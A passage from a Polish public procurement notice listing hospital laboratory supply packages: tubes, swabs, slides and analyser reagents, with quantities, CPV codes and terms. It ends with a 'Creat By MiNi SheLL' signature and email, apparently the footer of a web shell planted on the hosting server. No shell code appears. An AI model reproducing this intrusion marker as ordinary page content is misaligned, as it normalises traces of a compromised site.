14.	Probówki z polistyrenu do wirowania moczu poj.12 ml z podziałką do 10 ml ze stożkiem o poj. 1 ml  na osad moczu	szt.	200
15.	Ezy jałowe z polistyrenu o poj 10 ul pakowane po 20 lub 50szt	szt.	13200
16.	Mikrobanki-probówki z granulatem do głębokiego zamrażania i przechowywania  szczepów (kuleczki) op. 80 szt.	op.	1
17.	Wymazówki drewniane jałowe pakowane pojedynczo	szt.	6840
18.	Wymazówki jałowe w probówce bez podłoza transportowego z aplikatorem z tworzywa w pakiecie	szt.	1440
19.	Ezy jałowe z polistyrenu o poj. 1 ul pakowane po 20 lub 50szt	szt.	17700
20.	Podłoże transportowo-wzrostowe do posiewu moczu typu uromedium, pakowane po 10 lub 20 szt.	szt.	96
21.	Zestaw transportowy Amies -wymazówki bawełniane cienkie na druciku aluminiowym do wymazu z oka, ucha, nosogardła	szt.	200
22.	zestaw transportowy Amies -wymazówka z aplikatorem plastikowym z wiskozowym wacikiem bez węgla	szt.	2220
23.	Kamera z siatką do oglądania osadu moczu na 10 miejsc	szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.65.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet nr 19 - Zamknięty system do pobierani krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	Morfologia krwi: Probówki z EDTA objętość 1,2 - 1,4 ml	szt.	20200
2.	Biochemia:Probówka z aktywatorem wykrzepiania objętość pobrania 4,5-5 ml średnica 13mm.	szt.	33650
3.	Serologia:Probówka z aktywatorem wykrzepiania objętość pobrania 8-10 ml 	szt.	4750
4.	Glukoza: Probówka z fluorkiem sodu 1,2 - 1,4 ml	szt.	800
5.	Koagulologia: Probówka z 3,2% cytrynianem sodu, objętość pobrania 1,4-1,8 ml	szt.	8400
6.	Igły 8/21G 	szt.	3300
7.	Igły 9/20G 	szt.	9550
8.	Łączniki do wenflonów	szt.	6800
9.	Probówki do OB objętość 1,2- 2,0 ml plus pipeta 	szt.	1250
10.	Nakłuwacze 1,8	szt.	2800
11.	Nakłuwacze dla noworodków	szt.	2200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet Nr 20 - Probówki, szkiełka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Opis  przedmiotu zamówienia Rozmiar J.m. Ilość
1.Próbowki PP do separacji surowicy  z granulatem i przyspieszaczem. na 10ml krwi 16x100mmszt. 1100
2.Próbowki  z propylenu, z granulatem do szybkiego wykrzepiania z kołnierzem 5ml szt. 24650
3.Próbowki  PS bez znacznika 4ml  12x75mm szt. 4300
4.Probówki  PS jałowe z korkiem 13ml 16,8mm x 95mm szt. 4900
5.Probówki  z cytrynianem 3,1 %  sodu do zestawu OB typu BIER-PAD standard (bez pipet i statywów ) szt. 400
6.Probówki Falcona stożkowe - sterylne 50ml szt. 50
7.Szkiełka podstawowe z ciętymi krawędziami, grubości 1mm i  matowym polem do opisu x 50szt 76mm x 26mm  op. 153
8.Szkiełka nakrywkowe x 100 szt 24mm x 24mm op. 49
9.Probówki z cytrynianem sodowym  do koagulacji  na 1,8ml krwi szt. 5200
10.Probówki z K 2 EDTA i NaF  do glukozy na 1ml krwi szt. 4600
11.Probówki z K 2 EDTA  do hematologii na 1ml krwi szt. 16100
12.Szkiełka podstawowe cięte grubość 1mm op. 50 szt.  76mm x 26mm op. 4
13.Probówki na 200ul z kapilarą do pobierania krwi (EDTA-K2) szt. 600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet nr 21- Odczynniki do analizatora hematologicznego  wraz z dzierżawą aparatu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia
1.	2.
1.	Odczynniki niezbędne do wykonania 
25 000 oznaczeń w ciągu 12 m-cy
	
	
	
	
	
2.	Krew kontrolna  mianowana  27 parametrowa  na okres 12 m-cy N, H
3.	Krew kontrolna  do międzynarodowej kontroli na okres 12 m-cy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.79.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet nr 22 - Odczynniki  do koagulologii wraz z dzierżawą analizatora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	Szacunkowa ilość badań na okres 12 m-cy  
1.	PTT	10000
2.	APTT	6000
3.	Fibrynogen	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.79.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet nr 23 - Odczynniki immunochemiczne wraz z dzierżawą analizatora immunochemicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	Szacunkowa ilość oznaczeń na okres 12m-cy
1.	Troponina T	2400
2.	ßHCG 	400
3.	HBsAg	7200
4.	Prolaktyna	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.79.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com